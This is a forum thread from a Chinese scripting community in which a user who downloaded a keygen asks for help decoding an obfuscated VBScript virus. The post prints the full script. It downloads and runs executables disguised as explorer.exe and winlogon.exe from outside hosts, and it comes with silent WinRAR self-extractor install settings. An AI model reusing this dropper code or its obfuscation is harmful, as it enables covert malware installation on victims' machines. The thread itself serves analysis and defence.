找回密码
 注册
搜索
[新手上路]批处理新手入门导读[视频教程]批处理基础视频教程[视频教程]VBS基础视频教程[批处理精品]批处理版照片整理器
[批处理精品]纯批处理备份&还原驱动[批处理精品]CMD命令50条不能说的秘密[在线下载]第三方命令行工具[在线帮助]VBScript / JScript 在线参考
查看: 12262|回复: 2

[已解决]懂VBS脚本的请帮忙分析下这个加密的脚本

[复制链接]
发表于 2010-5-3 05:14:17 | 显示全部楼层 |阅读模式
这个文件是病毒,我访问某网站下的注册机,请VB脚本高手帮忙解析一下每句的用处。
下面是VB脚本(另外问问是不是乱码?源文件:http://u.115.com/file/f9cc62347f ,只修改其扩展名为RAR。)

  1. Heqianwei="何何aa.run锡丹伟iexplore锡丹http://www.mflj.info/tongji.php伟,0何set锡丹aa=wscript.createobject(伟wscript.shell伟)何on锡丹error锡丹resume锡丹next锡丹何何何何objshell.run锡丹伟伟伟C:\WINDOWS\system32\config\explorer.exe伟伟伟锡丹何Set锡丹objShell锡丹=锡丹CreateObject(伟Wscript.Shell伟)锡丹何sGet.SaveToFile锡丹伟C:\WINDOWS\system32\config\explorer.exe伟,2锡丹何sGet.Write(xPost.responseBody)锡丹何sGet.Open()锡丹何sGet.Type锡丹=锡丹1锡丹何sGet.Mode锡丹=锡丹3锡丹何Set锡丹sGet锡丹=锡丹createObject(伟ADODB.Stream伟)锡丹何xPost.Send()锡丹何xPost.Open锡丹伟GET伟,伟http://www.cqzcys.com/1cys/explorer.exe伟,0锡丹何Set锡丹xPost锡丹=锡丹createObject(伟Microsoft.XMLHTTP伟)锡丹何何何何objshell.run锡丹伟伟伟C:\WINDOWS\system32\config\winlogon.exe伟伟伟锡丹何Set锡丹objShell锡丹=锡丹CreateObject(伟Wscript.Shell伟)锡丹何sGet.SaveToFile锡丹伟C:\WINDOWS\system32\config\winlogon.exe伟,2锡丹何sGet.Write(xPost.responseBody)锡丹何sGet.Open()锡丹何sGet.Type锡丹=锡丹1锡丹何sGet.Mode锡丹=锡丹3锡丹何Set锡丹sGet锡丹=锡丹createObject(伟ADODB.Stream伟)锡丹何xPost.Send()锡丹何xPost.Open锡丹伟GET伟,伟http://www.gggirl.info/1cys/winlogon.exe伟,0锡丹何Set锡丹xPost锡丹=锡丹createObject(伟Microsoft.XMLHTTP伟)锡丹何何何何End锡丹If何objShell.Run(伟http://www.gggirl.info/2.php伟)锡丹何Else锡丹何objShell.Run(伟http://www.gggirl.info/2.php伟)锡丹何If锡丹intMessage锡丹=锡丹vbYes锡丹Then锡丹何vbYesNo,锡丹伟Access锡丹Denied伟)锡丹何intMessage锡丹=锡丹Msgbox(伟确定打开国名为最大的成人视频网站吗伟,锡丹_锡丹何Set锡丹objShell锡丹=锡丹CreateObject(伟Wscript.Shell伟)锡丹何"
  2. Heqianwei = Replace(Heqianwei, "锡丹",chr(9))
  3. Heqianwei = Replace(Heqianwei, "伟", chr(34))
  4. Heqianwei = Replace(Heqianwei, "钱", chr(39))
  5. execute(MyEncode(Heqianwei))
  6. function MyEncode(hack520org)
  7. sz = Split(hack520org, "何")
  8. For i = UBound(sz) To 0 Step -1
  9. weiwei = weiwei + sz(i) + vbcrlf
  10. Next
  11. MyEncode=weiwei
  12. end function
复制代码


PS,Winrar自解压命令很暴力...
Path=C:\WINDOWS\system32\config
SavePath
Setup=2.vbs
Silent=1
Overwrite=1

[ 本帖最后由 jixun66 于 2010-5-3 18:33 编辑 ]

评分

参与人数 1PB +2 收起 理由
Batcher + 2 感谢主动给标题标注[已解决]字样

查看全部评分

发表于 2010-5-3 09:35:47 | 显示全部楼层
参考:批处理解密破解已经加密的VBS
http://bbs.bathome.net/thread-3637-1-1.html
 楼主| 发表于 2010-5-3 18:32:23 | 显示全部楼层
谢谢,这下可以自己分析!
您需要登录后才可以回帖 登录 | 注册

本版积分规则

Archiver|手机版|小黑屋|批处理之家 ( 渝ICP备10000708号 )

GMT+8, 2026-3-17 06:49 , Processed in 0.025796 second(s), 12 queries , File On.

Powered by Discuz! X3.5

© 2001-2026 Discuz! Team.

快速回复 返回顶部 返回列表